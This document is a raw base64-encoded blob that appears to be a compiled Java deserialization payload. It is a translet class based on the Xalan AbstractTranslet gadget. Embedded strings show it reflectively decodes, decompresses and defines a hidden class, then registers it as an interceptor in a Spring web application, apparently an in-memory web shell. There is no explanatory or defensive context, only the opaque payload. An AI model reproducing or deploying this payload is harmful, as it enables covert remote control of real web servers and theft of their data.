MmEzWkNMMHhDVDBzM2VHMW5ha2h4YzFGdFVFNUhWbXhoU25SeFMyWnFaVTVZWjFoSlJ6bHVTV0pJTnpsT05EUXZTRGhXZVZoMlZIbE9SamhpZDFaM2JuY3pPVkEwVm5oMFdrRnFOVnBFWTNkbldtNDJiVWR6Tm0xaU9FSjFjbTVpVXpoNk1WbG5hWFUxZGpWalZWaGhlVTVtVVZwUGNUQnVjbHBHVm1OcFNqbFpPVmcyUWpCaVJIbFRVRVpVWm1kdVJIY3lUR3RVV2t0T1dHZFlORm9yV1RGcVpWWmFlR3Q0YzBWVVF6WkpXRU5CVW5JNGVVeDJTVU0xWTFoRFRHczJTUzlNVW5kc1psQjBWRzkxYVRsbmIyMWhURVpaWWtnNFVXZzNjSE5TWmxWa00wdDJaMm9yUlhWWGVHMHZhVEEwWjFGRkwzRXliM1JHYVZOR1FscHhZVGt4UnpSM1RHTjBiRXR5V0ZBMGJrdDNWVzgwWVdKbVFXbEthMnRPYWxVM2VIVktXVUpaYUU1RVExWjZSak5YTkRaSE1sSlVOMU5HWkdoS1VXRkxablZaVUdsSWMxcEJjV3RIVUhob1NuTkpiM2Q1TTBKaFUwZEJTek5xYnl0TVkxSmhhV1pVT0dvNU5HdFdTakpaY0RKNFdtbGtibkJpV0ZkNFQxUTFjamxXVVVSMVFpOUNSa3REVDBseFdITnBRalphVW5ONE1tdFNPVUp6VWtwT2EwTTNPV1IyYjBaWWVrMTZRWGhsWm1sNVVYVjVlVkZpT0RCQ1pXWnVZMGxMS3pBNFFYSk5Rbkp1WlM5RFRtOUVXVkkyTVZONWJ6RXJVM2w2YjBJMmFXNWpTemhIWWtOV1RVMXhka0ZGTTNwUlFqaFFNMlJVYUVjeVVVbEJObEkzYm5CVFJIQk9lV3hCUW1WM05YYzRVVW8zY25sSVZYUk1OV3N6TlVGRWRVWmhWVmMwVUZWWGRVb3pkMGRYZERKamJUWXlNV3h4V25GU2JrRmllVmhuV25SaVpWRnpRM0pqWjBaMmMySkxNak5uU3poVVowcDFMMG8wWW1OTFpGbHROVE5VZWxWYVNsVkdRM2hQVDJOWmJHaGxUR1JqWlhjNWJGRlVWbGRUYm5RMWN6SmxXRUZYT0VOdlkyVlZPREl4YUZsQlFVRTlQUWdBRndFQUJqeHBibWwwUGdFQUZTaE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BWZ3dBR1FBYUNnQVdBQnNCQUFNb0tWWUJBQWRqYjI1MFpYaDBBUUFTVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QVFBTGFXNTBaWEpqWlhCMGIzSU1BQmtBSFFvQUJBQWhBUUFLWjJWMFEyOXVkR1Y0ZEFFQUZDZ3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdEQUFqQUNRS0FBSUFKUUVBRG1kbGRFbHVkR1Z5WTJWd2RHOXlEQUFuQUNRS0FBSUFLQUVBRG1Ga1pFbHVkR1Z5WTJWd2RHOXlBUUFuS0V4cVlYWmhMMnhoYm1jdlQySnFaV04wTzB4cVlYWmhMMnhoYm1jdlQySnFaV04wT3lsV0RBQXFBQ3NLQUFJQUxBRUFFMnBoZG1FdmJHRnVaeTlGZUdObGNIUnBiMjRIQUM0QkFCRnlaWEYxWlhOMFFYUjBjbWxpZFhSbGN3RUFDMmgwZEhCeVpYRjFaWE4wQVFBSGMyVnpjMmx2YmdFQURuTmxjblpzWlhSRGIyNTBaWGgwQVFBVFlYQndiR2xqWVhScGIyNURiMjUwWlhoMGN3RUFHVXhxWVhaaEwzVjBhV3d2VEdsdWEyVmtTR0Z6YUZObGREc0JBQkpoY0hCc2FXTmhkR2x2YmtOdmJuUmxlSFFCQUF0amJHRnpjMHh2WVdSbGNnRUFGMHhxWVhaaEwyeGhibWN2UTJ4aGMzTk1iMkZrWlhJN0FRQVZhbUYyWVM5c1lXNW5MME5zWVhOelRHOWhaR1Z5QndBNUFRQVFhbUYyWVM5c1lXNW5MMDlpYW1WamRBY0FPd0VBRFZOMFlXTnJUV0Z3VkdGaWJHVUJBQkJxWVhaaEwyeGhibWN2VkdoeVpXRmtCd0ErQVFBTlkzVnljbVZ1ZEZSb2NtVmhaQUVBRkNncFRHcGhkbUV2YkdGdVp5OVVhSEpsWVdRN0RBQkFBRUVLQUQ4QVFnRUFGV2RsZEVOdmJuUmxlSFJEYkdGemMweHZZV1JsY2dFQUdTZ3BUR3BoZG1FdmJHRnVaeTlEYkdGemMweHZZV1JsY2pzTUFFUUFSUW9BUHdCR0FRQThiM0puTG5Od2NtbHVaMlp5WVcxbGQyOXlheTUzWldJdVkyOXVkR1Y0ZEM1eVpYRjFaWE4wTGxKbGNYVmxjM1JEYjI1MFpYaDBTRzlzWkdWeUNBQklBUUFKYkc5aFpFTnNZWE56QVFBbEtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk95bE1hbUYyWVM5c1lXNW5MME5zWVhOek93d0FTZ0JMQ2dBNkFFd0JBQlJuWlhSU1pYRjFaWE4wUVhSMGNtbGlkWFJsY3dnQVRnRUFER2x1ZG05clpVMWxkR2h2WkFFQU9DaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREdE1hbUYyWVM5c1lXNW5MMU4wY21sdVp6c3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdEQUJRQUZFS0FBSUFVZ0VBQ21kbGRGSmxjWFZsYzNRSUFGUUJBQXBuWlhSVFpYTnphVzl1Q0FCV0FRQVJaMlYwVTJWeWRteGxkRU52Ym5SbGVIUUlBRmdCQUVKdmNtY3VjM0J5YVc1blpuSmhiV1YzYjNKckxuZGxZaTVqYjI1MFpYaDBMbk4xY0hCdmNuUXVWMlZpUVhCd2JHbGpZWFJwYjI1RGIyNTBaWGgwVlhScGJITUlBRm9CQUJoblpYUlhaV0pCY0hCc2FXTmhkR2x2YmtOdmJuUmxlSFFJQUZ3QkFBOXFZWFpoTDJ4aGJtY3ZRMnhoYzNNSEFGNEJBQnhxWVhaaGVDNXpaWEoyYkdWMExsTmxjblpzWlhSRGIyNTBaWGgwQ0FCZ0FRQmRLRXhxWVhaaEwyeGhibWN2VDJKcVpXTjBPMHhxWVhaaEwyeGhibWN2VTNSeWFXNW5PMXRNYW1GMllTOXNZVzVuTDBOc1lYTnpPMXRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3REFCUUFHSUtBQUlBWXdFQU1XOXlaeTV6Y0hKcGJtZG1jbUZ0WlhkdmNtc3VZMjl1ZEdWNGRDNXpkWEJ3YjNKMExreHBkbVZDWldGdWMxWnBaWGNJQUdVQkFBdHVaWGRKYm5OMFlXNWpaUXdBWndBa0NnQmZBR2dJQURRQkFBVm5aWFJHVmd3QWF3QlJDZ0FDQUd3QkFCZHFZWFpoTDNWMGFXd3ZUR2x1YTJWa1NHRnphRk5sZEFjQWJnRUFDR2wwWlhKaGRHOXlBUUFXS0NsTWFtRjJZUzkxZEdsc0wwbDBaWEpoZEc5eU93d0FjQUJ4Q2dCdkFISUJBQkpxWVhaaEwzVjBhV3d2U1hSbGNtRjBiM0lIQUhRQkFBUnVaWGgwREFCMkFDUUxBSFVBZHdFQU5XOXlaeTV6Y0hKcGJtZG1jbUZ0WlhkdmNtc3VkMlZpTG1OdmJuUmxlSFF1VjJWaVFYQndiR2xqWVhScGIyNURiMjUwWlhoMENBQjVBUUFJWjJWMFEyeGhjM01CQUJNb0tVeHFZWFpoTDJ4aGJtY3ZRMnhoYzNNN0RBQjdBSHdLQUR3QWZRRUFFR2x6UVhOemFXZHVZV0pzWlVaeWIyMEJBQlFvVEdwaGRtRXZiR0Z1Wnk5RGJHRnpjenNwV2d3QWZ3Q0FDZ0JmQUlFQkFDQnFZWFpoTDJ4aGJtY3ZRMnhoYzNOT2IzUkdiM1Z1WkVWNFkyVndkR2x2YmdjQWd3RUFLMnBoZG1FdmJHRnVaeTl5Wldac1pXTjBMMGx1ZG05allYUnBiMjVVWVhKblpYUkZlR05sY0hScGIyNEhBSVVCQUI5cVlYWmhMMnhoYm1jdlRtOVRkV05vVFdWMGFHOWtSWGhqWlhCMGFXOXVCd0NIQVFBZ2FtRjJZUzlzWVc1bkwwbHNiR1ZuWVd4QlkyTmxjM05GZUdObGNIUnBiMjRIQUlrQkFCTnFZWFpoTDJ4aGJtY3ZWR2h5YjNkaFlteGxCd0NMQVFBSlkyeGhlbnBDZVhSbEFRQUNXMElCQUF0a1pXWnBibVZEYkdGemN3RUFHa3hxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlOWlhSb2IyUTdBUUFGWTJ4aGVub0JBQkZNYW1GMllTOXNZVzVuTDBOc1lYTnpPd0VBQVdVQkFCVk1hbUYyWVM5c1lXNW5MMFY0WTJWd2RHbHZianNNQUE0QUJnb0FBZ0NWREFBUkFBWUtBQUlBbHdFQURHUmxZMjlrWlVKaGMyVTJOQUVBRmloTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFcwSU1BSmtBbWdvQUFnQ2JBUUFPWjNwcGNFUmxZMjl0Y0hKbGMzTUJBQVlvVzBJcFcwSU1BSjBBbmdvQUFnQ2ZDQUNQQndDT0FRQVJhbUYyWVM5c1lXNW5MMGx1ZEdWblpYSUhBS01CQUFSVVdWQkZEQUNsQUpJSkFLUUFwZ0VBRVdkbGRFUmxZMnhoY21Wa1RXVjBhRzlrQVFCQUtFeHFZWFpoTDJ4aGJtY3ZVM1J5YVc1bk8xdE1hbUYyWVM5c1lXNW5MME5zWVhOek95bE1hbUYyWVM5c1lXNW5MM0psWm14bFkzUXZUV1YwYUc5a093d0FxQUNwQ2dCZkFLb0JBQmhxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlOWlhSb2IyUUhBS3dCQUExelpYUkJZMk5sYzNOcFlteGxBUUFFS0ZvcFZnd0FyZ0N2Q2dDdEFMQUJBQWQyWVd4MVpVOW1BUUFXS0VrcFRHcGhkbUV2YkdGdVp5OUpiblJsWjJWeU93d0FzZ0N6Q2dDa0FMUUJBQVpwYm5admEyVUJBRGtvVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3VzB4cVlYWmhMMnhoYm1jdlQySnFaV04wT3lsTWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzTUFMWUF0d29BclFDNEFRQVdZV0p6ZEhKaFkzUklZVzVrYkdWeVRXRndjR2x1WndFQUUyRmtZWEIwWldSSmJuUmxjbU5sY0hSdmNuTUJBQlZNYW1GMllTOTFkR2xzTDBGeWNtRjVUR2x6ZERzQkFCWk1iMk5oYkZaaGNtbGhZbXhsVkhsd1pWUmhZbXhsQVFBcFRHcGhkbUV2ZFhScGJDOUJjbkpoZVV4cGMzUThUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdQanNCQUFkblpYUkNaV0Z1Q0FDL0FRQWNjbVZ4ZFdWemRFMWhjSEJwYm1kSVlXNWtiR1Z5VFdGd2NHbHVad2dBd1FnQXV3RUFFMnBoZG1FdmRYUnBiQzlCY25KaGVVeHBjM1FIQU1RQkFBTmhaR1FCQUJVb1RHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0tWb01BTVlBeHdvQXhRRElBUUFNWkdWamIyUmxja05zWVhOekFRQUhaR1ZqYjJSbGNnRUFCMmxuYm05eVpXUUJBQWxpWVhObE5qUlRkSElCQUJKTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzQkFCUk1hbUYyWVM5c1lXNW5MME5zWVhOelBDbytPd0VBRm5OMWJpNXRhWE5qTGtKQlUwVTJORVJsWTI5a1pYSUlBTkFCQUFkbWIzSk9ZVzFsREFEU0FFc0tBRjhBMHdFQURHUmxZMjlrWlVKMVptWmxjZ2dBMVFFQUNXZGxkRTFsZEdodlpBd0Exd0NwQ2dCZkFOZ0JBQkJxWVhaaExuVjBhV3d1UW1GelpUWTBDQURhQVFBS1oyVjBSR1ZqYjJSbGNnZ0EzQUVBQm1SbFkyOWtaUWdBM2dFQURtTnZiWEJ5WlhOelpXUkVZWFJoQVFBRGIzVjBBUUFmVEdwaGRtRXZhVzh2UW5sMFpVRnljbUY1VDNWMGNIVjBVM1J5WldGdE93RUFBbWx1QVFBZVRHcGhkbUV2YVc4dlFubDBaVUZ5Y21GNVNXNXdkWFJUZEhKbFlXMDdBUUFHZFc1bmVtbHdBUUFmVEdwaGRtRXZkWFJwYkM5NmFYQXZSMXBKVUVsdWNIVjBVM1J5WldGdE93RUFCbUoxWm1abGNnRUFBVzRCQUFGSkFRQWRhbUYyWVM5cGJ5OUNlWFJsUVhKeVlYbFBkWFJ3ZFhSVGRISmxZVzBIQU9vQkFCeHFZWFpoTDJsdkwwSjVkR1ZCY25KaGVVbHVjSFYwVTNSeVpXRnRCd0RzQVFBZGFtRjJZUzkxZEdsc0wzcHBjQzlIV2tsUVNXNXdkWFJUZEhKbFlXMEhBTzRLQU9zQUlRRUFCU2hiUWlsV0RBQVpBUEVLQU8wQThnRUFHQ2hNYW1GMllTOXBieTlKYm5CMWRGTjBjbVZoYlRzcFZnd0FHUUQwQ2dEdkFQVUJBQVJ5WldGa0FRQUZLRnRDS1VrTUFQY0ErQW9BN3dENUFRQUZkM0pwZEdVQkFBY29XMEpKU1NsV0RBRDdBUHdLQU9zQS9RRUFDM1J2UW5sMFpVRnljbUY1QVFBRUtDbGJRZ3dBL3dFQUNnRHJBUUVCQUFWelpYUkdWZ0VBT1NoTWFtRjJZUzlzWVc1bkwwOWlhbVZqZER0TWFtRjJZUzlzWVc1bkwxTjBjbWx1Wnp0TWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFZnRUFCSFpoY2pBQkFBUjJZWEl4QVFBRGRtRnNBUUFFWjJWMFJnRUFQeWhNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHRNYW1GMllTOXNZVzVuTDFOMGNtbHVaenNwVEdwaGRtRXZiR0Z1Wnk5eVpXWnNaV04wTDBacFpXeGtPd3dCQ0FFSkNnQUNBUW9CQUJkcVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5R2FXVnNaQWNCREFFQUEzTmxkQXdCRGdBckNnRU5BUThCQUFOdlltb0JBQWxtYVdWc1pFNWhiV1VCQUFWbWFXVnNaQUVBR1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5R2FXVnNaRHNLQVEwQXNBRUFBMmRsZEFFQUppaE1hbUYyWVM5c1lXNW5MMDlpYW1WamREc3BUR3BoZG1FdmJHRnVaeTlQWW1wbFkzUTdEQUVXQVJjS0FRMEJHQUVBSG1waGRtRXZiR0Z1Wnk5T2IxTjFZMmhHYVdWc1pFVjRZMlZ3ZEdsdmJnY0JHZ0VBSUV4cVlYWmhMMnhoYm1jdlRtOVRkV05vUm1sbGJHUkZlR05sY0hScGIyNDdBUUFRWjJWMFJHVmpiR0Z5WldSR2FXVnNaQUVBTFNoTWFtRjJZUzlzWVc1bkwxTjBjbWx1WnpzcFRHcGhkbUV2YkdGdVp5OXlaV1pzWldOMEwwWnBaV3hrT3d3QkhRRWVDZ0JmQVI4QkFBMW5aWFJUZFhCbGNtTnNZWE56REFFaEFId0tBRjhCSWdvQkd3QWJBUUFNZEdGeVoyVjBUMkpxWldOMEFRQUtiV1YwYUc5a1RtRnRaUUVBQVdrQkFBZHRaWFJvYjJSekFRQWJXMHhxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlOWlhSb2IyUTdBUUFoVEdwaGRtRXZiR0Z1Wnk5T2IxTjFZMmhOWlhSb2IyUkZlR05sY0hScGIyNDdBUUFpVEdwaGRtRXZiR0Z1Wnk5SmJHeGxaMkZzUVdOalpYTnpSWGhqWlhCMGFXOXVPd0VBQ25CaGNtRnRRMnhoZW5vQkFCSmJUR3BoZG1FdmJHRnVaeTlEYkdGemN6c0JBQVZ3WVhKaGJRRUFFMXRNYW1GMllTOXNZVzVuTDA5aWFtVmpkRHNCQUFadFpYUm9iMlFCQUFsMFpXMXdRMnhoYzNNSEFTa0JBQkpuWlhSRVpXTnNZWEpsWkUxbGRHaHZaSE1CQUIwb0tWdE1hbUYyWVM5c1lXNW5MM0psWm14bFkzUXZUV1YwYUc5a093d0JNd0UwQ2dCZkFUVUJBQWRuWlhST1lXMWxEQUUzQUFZS0FLMEJPQUVBQm1WeGRXRnNjd3dCT2dESENnQVdBVHNCQUJGblpYUlFZWEpoYldWMFpYSlVlWEJsY3dFQUZDZ3BXMHhxWVhaaEwyeGhibWN2UTJ4aGMzTTdEQUU5QVQ0S0FLMEJQd29BaUFBYkFRQWFhbUYyWVM5c1lXNW5MMUoxYm5ScGJXVkZlR05sY0hScGIyNEhBVUlCQUFwblpYUk5aWE56WVdkbERBRkVBQVlLQUlvQlJRb0JRd0FiQUNFQUFnQUVBQUFBQUFBT0FBRUFCUUFHQUFFQUJ3QUFBQzBBQVFBQkFBQUFBeElOc0FBQUFBSUFDQUFBQUFZQUFRQUFBQkFBQ1FBQUFBd0FBUUFBQUFNQUNnQUxBQUFBQVFBT0FBWUFBUUFIQUFBQUVBQUJBQUVBQUFBRUV3QVFzQUFBQUFBQUFRQVJBQVlBQWdBU0FBQUFCQUFCQUJRQUJ3QUFBQmNBQXdBQkFBQUFDN3NBRmxrVEFCaTNBQnl3QUFBQUFBQUJBQmtBSFFBQ0FBY0FBQUJqQUFNQUF3QUFBQlVxdHdBaUtyWUFKa3dxdHdBcFRTb3JMTFlBTGJFQUFBQUNBQWdBQUFBV0FBVUFBQUFkQUFRQUhnQUpBQjhBRGdBZ0FCUUFJZ0FKQUFBQUlBQURBQUFBRlFBS0FBc0FBQUFKQUF3QUhnQWZBQUVBRGdBSEFDQUFId0FDQUJJQUFBQUVBQUVBTHdBQkFDTUFKQUFDQUFjQUFBRjhBQWNBQndBQUFKQzRBRU8yQUVkTUFVMHJFa20yQUUwU1Q3Z0FVMDR0RWxXNEFGTTZCQmtFRWxlNEFGTTZCUmtGRWxtNEFGTTZCaXNTVzdZQVRSSmRCTDBBWDFrREt4Smh0Z0JOVXdTOUFEeFpBeGtHVTdnQVpFMm5BQVJPTE1jQU9Dc1NacllBVGJZQWFSSnF1QUJ0d0FCdlRpMjJBSE81QUhnQkFEb0VLeEo2dGdCTkdRUzJBSDYyQUlLWkFBWVpCRTJuQUFST0xMQUFBZ0FKQUZFQVZBQXZBRmtBaWdDTkFDOEFBd0FJQUFBQVJnQVJBQUFBSlFBSEFDWUFDUUFvQUJVQUtRQWRBQ29BSmdBckFDOEFMQUJSQUM0QVZBQXRBRlVBTUFCWkFESUFhd0F6QUhZQU5BQ0hBRFVBaWdBNEFJMEFOd0NPQURvQUNRQUFBRndBQ1FBVkFEd0FNQUFmQUFNQUhRQTBBREVBSHdBRUFDWUFLd0F5QUI4QUJRQXZBQ0lBTXdBZkFBWUFhd0FmQURRQU5RQURBSFlBRkFBMkFCOEFCQUFBQUpBQUNnQUxBQUFBQndDSkFEY0FPQUFCQUFrQWh3QWVBQjhBQWdBOUFBQUFIQUFGL3dCVUFBTUhBQUlIQURvSEFEd0FBUWNBTHdBMFFnY0FMd0FBRWdBQUFBb0FCQUNFQUlZQWlBQ0tBQUlBSndBa0FBSUFCd0FBQVZRQUJnQUhBQUFBZXJnQVE3WUFSMHdCVFNzcXRnQ1d0Z0JOdGdCcFRhY0FZMDRxdGdDWXVBQ2N1QUNnT2dRU09oS2hCcjBBWDFrREVxSlRXUVN5QUtkVFdRV3lBS2RUdGdDck9nVVpCUVMyQUxFWkJTc0d2UUE4V1FNWkJGTlpCQU80QUxWVFdRVVpCTDY0QUxWVHRnQzV3QUJmT2dZWkJyWUFhVTJuQUFVNkJDeXdBQUlBQ1FBVkFCZ0FMd0FaQUhNQWRnQ01BQU1BQ0FBQUFEWUFEUUFBQUQ0QUJ3QS9BQWtBUVFBVkFFc0FHQUJDQUJrQVJBQWxBRVVBUXdCR0FFa0FSd0J0QUVnQWN3QktBSFlBU1FCNEFFd0FDUUFBQUVnQUJ3QWxBRTRBalFDT0FBUUFRd0F3QUk4QWtBQUZBRzBBQmdDUkFKSUFCZ0FaQUY4QWt3Q1VBQU1BQUFCNkFBb0FDd0FBQUFjQWN3QTNBRGdBQVFBSkFIRUFJQUFmQUFJQVBRQUFBQzRBQS84QUdBQURCd0FDQndBNkJ3QThBQUVIQUMvL0FGMEFCQWNBQWdjQU9nY0FQQWNBTHdBQkJ3Q00rZ0FCQUJJQUFBQUVBQUVBTHdBQkFDb0FLd0FCQUFjQUFBQzlBQWNBQlFBQUFEQXJFc0FFdlFCZldRTVNGbE1FdlFBOFdRTVN3bE80QUdST0xSTER1QUJ0d0FERk9nUVpCQ3kyQU1sWHB3QUVUckVBQVFBQUFDc0FMZ0F2QUFRQUNBQUFBQm9BQmdBQUFGRUFHUUJTQUNRQVV3QXJBRlVBTGdCVUFDOEFWZ0FKQUFBQU5BQUZBQmtBRWdDNkFCOEFBd0FrQUFjQXV3QzhBQVFBQUFBd0FBb0FDd0FBQUFBQU1BQWVBQjhBQVFBQUFEQUFJQUFmQUFJQXZRQUFBQXdBQVFBa0FBY0F1d0MrQUFRQVBRQUFBQWNBQW00SEFDOEFBQWdBbVFDYUFBSUFCd0FBQVFBQUJnQUVBQUFBYWhMUnVBRFVUQ3NTMWdTOUFGOVpBeElXVTdZQTJTdTJBR2tFdlFBOFdRTXFVN1lBdWNBQW9zQUFvckJORXR1NEFOUk1LeExkQTcwQVg3WUEyUUVEdlFBOHRnQzVUaTIyQUg0UzN3UzlBRjlaQXhJV1U3WUEyUzBFdlFBOFdRTXFVN1lBdWNBQW9zQUFvckFBQVFBQUFDb0FLd0F2QUFRQUNBQUFBQm9BQmdBQUFGd0FCZ0JkQUNzQVhnQXNBRjhBTWdCZ0FFVUFZUUFKQUFBQU5BQUZBQVlBSlFES0FKSUFBUUJGQUNVQXl3QWZBQU1BTEFBK0FNd0FsQUFDQUFBQWFnRE5BTTRBQUFBeUFEZ0F5Z0NTQUFFQXZRQUFBQllBQWdBR0FDVUF5Z0RQQUFFQU1nQTRBTW9BendBQkFEMEFBQUFHQUFGckJ3QXZBQklBQUFBS0FBUUFoQUNJQUlZQWlnQUpBSjBBbmdBQ0FBY0FBQURVQUFRQUJnQUFBRDY3QU90WnR3RHdUTHNBN1ZrcXR3RHpUYnNBNzFrc3R3RDJUaEVCQUx3SU9nUXRHUVMyQVBwWk5nV2JBQThyR1FRREZRVzJBUDZuLytzcnRnRUNzQUFBQUFNQUNBQUFBQjRBQndBQUFHWUFDQUJuQUJFQWFBQWFBR2tBSVFCckFDMEFiQUE1QUc0QUNRQUFBRDRBQmdBQUFENEE0QUNPQUFBQUNBQTJBT0VBNGdBQkFCRUFMUURqQU9RQUFnQWFBQ1FBNVFEbUFBTUFJUUFkQU9jQWpnQUVBQ29BRkFEb0FPa0FCUUE5QUFBQUhBQUMvd0FoQUFVSEFLSUhBT3NIQU8wSEFPOEhBS0lBQVB3QUZ3RUFFZ0FBQUFRQUFRQVVBQ0FCQXdFRUFBSUFCd0FBQUZjQUF3QUVBQUFBQ3lzc3VBRUxLeTIyQVJDeEFBQUFBZ0FJQUFBQUNnQUNBQUFBY2dBS0FITUFDUUFBQUNvQUJBQUFBQXNBQ2dBTEFBQUFBQUFMQVFVQUh3QUJBQUFBQ3dFR0FNNEFBZ0FBQUFzQkJ3QWZBQU1BRWdBQUFBUUFBUUF2QUFnQWF3QlJBQUlBQndBQUFGY0FBZ0FEQUFBQUVTb3J1QUVMVFN3RXRnRVZMQ3EyQVJtd0FBQUFBZ0FJQUFBQURnQURBQUFBZGdBR0FIY0FDd0I0QUFrQUFBQWdBQU1BQUFBUkFSRUFId0FBQUFBQUVRRVNBTTRBQVFBR0FBc0JFd0VVQUFJQUVnQUFBQVFBQVFBdkFBZ0JDQUVKQUFJQUJ3QUFBTWNBQXdBRUFBQUFLQ3EyQUg1TkxNWUFHU3dydGdFZ1RpMEV0Z0VWTGJCT0xMWUJJMDJuLyttN0FSdFpLN2NCSkw4QUFRQUpBQlVBRmdFYkFBUUFDQUFBQUNZQUNRQUFBSHdBQlFCOUFBa0Fmd0FQQUlBQUZBQ0JBQllBZ2dBWEFJTUFIQUNFQUI4QWhnQUpBQUFBTkFBRkFBOEFCd0VUQVJRQUF3QVhBQVVBa3dFY0FBTUFBQUFvQVJFQUh3QUFBQUFBS0FFU0FNNEFBUUFGQUNNQWtRQ1NBQUlBdlFBQUFBd0FBUUFGQUNNQWtRRFBBQUlBUFFBQUFBMEFBL3dBQlFjQVgxQUhBUnNJQUJJQUFBQUVBQUVCR3dBb0FGQUFVUUFDQUFjQUFBQkNBQVFBQWdBQUFBNHFLd085QUY4RHZRQTh1QUJrc0FBQUFBSUFDQUFBQUFZQUFRQUFBSXNBQ1FBQUFCWUFBZ0FBQUE0QkpRQWZBQUFBQUFBT0FTWUF6Z0FCQUJJQUFBQUlBQU1BaUFDS0FJWUFLUUJRQUdJQUFnQUhBQUFDRndBREFBa0FBQURLS3NFQVg1a0FDaXJBQUYrbkFBY3F0Z0IrT2dRQk9nVVpCRG9HR1FYSEFHUVpCc1lBWHl6SEFFTVpCcllCTmpvSEF6WUlGUWdaQjc2aUFDNFpCeFVJTXJZQk9TdTJBVHlaQUJrWkJ4VUlNcllCUUw2YUFBMFpCeFVJTWpvRnB3QUpoQWdCcC8vUXB3QU1HUVlyTExZQXF6b0ZwLytwT2djWkJyWUJJem9HcC8rZEdRWEhBQXk3QUloWks3Y0JRYjhaQlFTMkFMRXF3UUJmbVFBYUdRVUJMYllBdWJBNkI3c0JRMWtaQjdZQlJyY0JSNzhaQlNvdHRnQzVzRG9IdXdGRFdSa0h0Z0ZHdHdGSHZ3QURBQ1VBY2dCMUFJZ0FuQUNqQUtRQWlnQ3pBTG9BdXdDS0FBTUFDQUFBQUc0QUd3QUFBSThBRkFDUUFCY0FrZ0FiQUpNQUpRQ1ZBQ2tBbHdBd0FKZ0FPd0NaQUZZQW1nQmRBSnNBWUFDWUFHWUFuZ0JwQUo4QWNnQ2pBSFVBb1FCM0FLSUFmZ0NqQUlFQXBRQ0dBS1lBandDb0FKVUFxUUNjQUtzQXBBQ3NBS1lBclFDekFMRUF1d0N5QUwwQXN3QUpBQUFBZWdBTUFETUFNd0VuQU9rQUNBQXdBRFlCS0FFcEFBY0Fkd0FIQUpNQktnQUhBS1lBRFFDVEFTc0FCd0M5QUEwQWt3RXJBQWNBQUFES0FSRUFId0FBQUFBQXlnRW1BTTRBQVFBQUFNb0JMQUV0QUFJQUFBREtBUzRCTHdBREFCUUF0Z0NSQUpJQUJBQVhBTE1CTUFDUUFBVUFHd0N2QVRFQWtnQUdBRDBBQUFBdkFBNE9Rd2NBWC80QUNBY0FYd2NBclFjQVgvMEFGd2NCTWdFcytRQUZBZ2hDQndDSUN3MVVCd0NLRGtjSEFJb0FFZ0FBQUFnQUF3Q0lBSVlBaWdBQQcARwwASABJDABKAEsHAEwBABBqYXZhL2xhbmcvT2JqZWN0BwBNDABOAE8MAFAAUQwAUgBTDABQAFQBAAhxb0JWeXhRSgEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAEGphdmEvdXRpbC9CYXNlNjQBAApnZXREZWNvZGVyAQAHRGVjb2RlcgEADElubmVyQ2xhc3NlcwEAHCgpTGphdmEvdXRpbC9CYXNlNjQkRGVjb2RlcjsBABhqYXZhL3V0aWwvQmFzZTY0JERlY29kZXIBAAZkZWNvZGUBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQAXZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcnMBACIoKVtMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQAdamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3IBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBABRnZXRTeXN0ZW1DbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAtuZXdJbnN0YW5jZQEAJyhbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAFCgpTGphdmEvbGFuZy9PYmplY3Q7DAAVABYKABQAVQAhABMAFAAAAAAAAwABABUAFgACABcAAACRAAYABQAAAFkqtwBWEgK4AANMKxIEBL0ABVkDEgZTtgAHTSwEtgAIuAAJEgq2AAtOK7YADAMyOgQZBAS2AA0sGQQEvQAOWQO4AA9TtgAQBL0ADlkDLVO2ABHAAAW2ABJXsQAAAAEAGAAAACYACQAAAA4ABAAPAAoAEAAaABEAHwASACgAEwAwABQANgAVAFgAFgAZAAAABAABABoAAQAbABwAAgAXAAAAGQAAAAMAAAABsQAAAAEAGAAAAAYAAQAAABoAGQAAAAQAAQAdAAEAGwAeAAIAFwAAABkAAAAEAAAAAbEAAAABABgAAAAGAAEAAAAfA